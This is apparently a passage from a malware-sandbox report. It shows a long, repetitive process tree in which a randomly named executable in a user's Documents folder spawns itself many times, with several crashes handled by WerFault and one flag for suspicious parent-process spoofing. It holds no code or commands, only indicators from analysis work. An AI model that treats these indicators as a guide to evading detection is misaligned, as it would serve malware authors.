  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 28
      4⤵
      Program crash
      PID:9052
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4916
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7324
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4020
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1372
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7000
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9024
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2552
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7404
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7808
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6872
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3024
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6808
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2208
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6152
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3088
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6384
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5108
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3856
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6580
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6584
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3696
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4880
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:584
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 28
      4⤵
      Program crash
      PID:7328
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6800
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4068
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID:5856
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8176
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:916
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:780
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8832
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3216
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8620
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5992
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8972
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2736
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2140
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:912
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6808
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7780
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7544
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8332
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6240
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4768
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9312
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9632
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9848
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10136
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9516
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9996
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9748
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10352
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11188
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9780
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10336
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11864
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11536
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12212
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12868
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9476
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10708
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9492
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13896
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9192
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14124
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13620
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11828
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13812
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9588
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13140
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2228
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11612
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12216
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14784
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15228
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 14532 -s 28
      4⤵
      Program crash
      PID:8936
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14964
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14372
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3232
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13980
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13680
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10200
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13684
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14036
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10972
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12616
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8692
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15376
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15884
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9664
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15428
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15640
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7248
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12536
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13692
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6372
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13872
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6560
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13240
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1716
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12400
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10000
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10888
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15428
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6084
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6388
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15836
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11772
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11384
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8508
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11952
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13708
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15356
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12700
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11140
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7008
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15352
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:9668
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15320
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5796
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10432
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11004
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4868
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15532
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4056
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14896
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13008
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:8160
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14900
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14076
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7060
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12992
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12384
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:4136
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10796
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13116
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:3668
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:11304
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:14820
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 28
      4⤵
      Program crash
      PID:11012
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13564
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:15572
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:5996
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:484
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10180
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:7712
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:2872
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:6832
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13380
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:12960
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:1488
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10196
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10548
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13148
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:13652
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
    PID:10444
- - C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    C:\Users\Admin\Documents\R_0TKJ3kogQbrcooaOq51koq.exe
    3⤵
